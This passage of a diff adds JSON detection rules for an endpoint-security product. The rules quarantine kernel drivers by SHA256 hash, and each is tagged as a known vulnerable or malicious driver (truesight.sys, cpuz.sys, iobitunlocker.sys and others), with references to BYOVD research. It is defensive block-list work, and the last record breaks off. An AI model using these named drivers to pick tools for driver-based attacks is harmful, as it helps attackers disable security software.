+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5dc477cc45e4c1421296373adef9f5795fb9f5035f1400c72bb37678ad7f8954",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b67b1f3-b108-5fe5-8bf5-657ec0f2523c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817444Z",
+ "creation_date": "2026-03-23T11:45:31.817446Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817452Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4c934b9604efe82b1cdb01837be62bc392988c0a975fe3945865e7463a49950",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b7105fc-3403-5c76-8a67-812f3382e625",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810698Z",
+ "creation_date": "2026-03-23T11:45:31.810700Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "146b7aa22d47b0585c5f6a41b4ca8acff056d26fa62304675199195cd62a40c4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b75725f-9d4a-5ce7-840b-84d7f0cc8fa0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813561Z",
+ "creation_date": "2026-03-23T11:45:31.813564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813573Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "045ac1a3b28a774ae92fc318b0370d3426a5db7d942e5113897ede9ec85888a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b80c240-d123-5a8b-8047-f3850b64d962",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975956Z",
+ "creation_date": "2026-03-23T11:45:29.975958Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975964Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b81ff99-5324-5f0c-a0c5-ad2246319012",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491920Z",
+ "creation_date": "2026-03-23T11:45:31.491922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c845b52bef8193d0187db0e1608f65807b46354fdd15a68fa2eca0a1462bcf2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b92336f-68d4-5aff-98b2-64e1481e7a68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456364Z",
+ "creation_date": "2026-03-23T11:45:30.456367Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456376Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aff83f28d70f425539fee3d6a780210d0406264f8a4eb124e32b074e8ffd556",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b9323ef-6313-597b-b1c3-222e2908f2a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472531Z",
+ "creation_date": "2026-03-23T11:45:30.472534Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472543Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0543f0fdc589c921b47877041f01b17a534c67dcc7c5ad60beba8cf7e7bc9c6",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b9a7ee2-af18-5ca6-a77e-549b32760fc4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474769Z",
+ "creation_date": "2026-03-23T11:45:30.474772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474781Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bedb25c95cead7deb60ef18c753b65131d9b7dcd13846f09b011060042586213",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ba330da-f486-56c3-a23b-ee1132d31427",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973199Z",
+ "creation_date": "2026-03-23T11:45:29.973201Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973206Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "911541d26b605a97ba099563b9eb7e027c102f139dba5884a57df5a13cf3dcef",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ba8babe-5961-5ccf-881d-7aed197ac336",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985759Z",
+ "creation_date": "2026-03-23T11:45:29.985761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985766Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4cfd9cb41a51b1e1fdfc9a6855323bf11a0baf18e5d8f0ee7480a8cb5be7c8ac",
+ "comment": "Malicious Kernel Driver (aka malicious.sys) [https://github.com/zeze-zeze/CYBERSEC2023-BYOVD-Demo] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bbecbf8-c13c-5415-a5c7-60f788426a9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156997Z",
+ "creation_date": "2026-03-23T11:45:31.156999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ca407794a31a010d4cad09311293244c19607ac903d7c06c4e85e5e452af300",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bc18ecb-5e36-5ec2-8c56-04096fed71a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476554Z",
+ "creation_date": "2026-03-23T11:45:30.476558Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476567Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae85245fcb873d6fbf61f1923b8c10f0680abeaf2bf5527aef1c4a52aae321d0",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bc21be2-c347-5872-b3f0-85636c24a00c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482058Z",
+ "creation_date": "2026-03-23T11:45:31.482061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482072Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27576ab7a5003133e73f00e870ea29ba6fa07f886f56f9377df2fc02640dd6b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bc4daf3-3cf9-5b5d-8177-ea685cb64019",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495261Z",
+ "creation_date": "2026-03-23T11:45:31.495264Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c74d5481c6de4b5020637777fd8ee8bf5d9a97bcfe15159594ae7af949a46e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bc87a01-5524-57e3-a5ee-19b10f1f013a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144092Z",
+ "creation_date": "2026-03-23T11:45:32.144094Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144100Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3855b2df32e0eedec454b25e6e2da6b3df19c4b0f575e45bc06482d4ebce7551",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bd8e88e-50de-5d20-9b51-c5ae8cb2a7f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832223Z",
+ "creation_date": "2026-03-23T11:45:30.832225Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832231Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2511804c17a1224866da91f3b65105acbcb11e7b7b1fcc1e29609194a95df406",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bdf2800-5255-50dd-9855-5b79ff1f718c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160363Z",
+ "creation_date": "2026-03-23T11:45:31.160365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88bcd2c1f5e17bee1a61bdc85d7226ee5e90c7728460e83df3108ccb5158bddb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bede8e0-e151-52ed-bb67-75c6633c271f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826156Z",
+ "creation_date": "2026-03-23T11:45:31.826158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826163Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ba13222e25b49a99d01019af0f1378b0003cd71ae72b1ec7f512b269e86ec83",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bf060b2-e23f-5480-be63-6f8ed10409ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809494Z",
+ "creation_date": "2026-03-23T11:45:31.809496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809504Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afce06fe02c7c628be20bb7dd578659e94032a21f29ba7355a82381a3470c714",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bf11efa-0f09-51b7-8ce3-5bfb70b71d45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828654Z",
+ "creation_date": "2026-03-23T11:45:31.828656Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828662Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bbf8808277c2ef684de28e5bae57b9e230203b6b2cb66539cabdba0b0ecfad8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4bf54704-8255-512c-8fd5-e9955052c367",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478800Z",
+ "creation_date": "2026-03-23T11:45:30.478804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e121d80264c51df9a6fca2f2201d75ccd4dc29d9566bbf0975bb05759e9c6c7",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4c13e5ba-205d-5f87-8372-56794702a727",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147350Z",
+ "creation_date": "2026-03-23T11:45:31.147352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3674adfa8151ac0100793e988aec708b0e8a2ca155226c140d7885476f971e1",
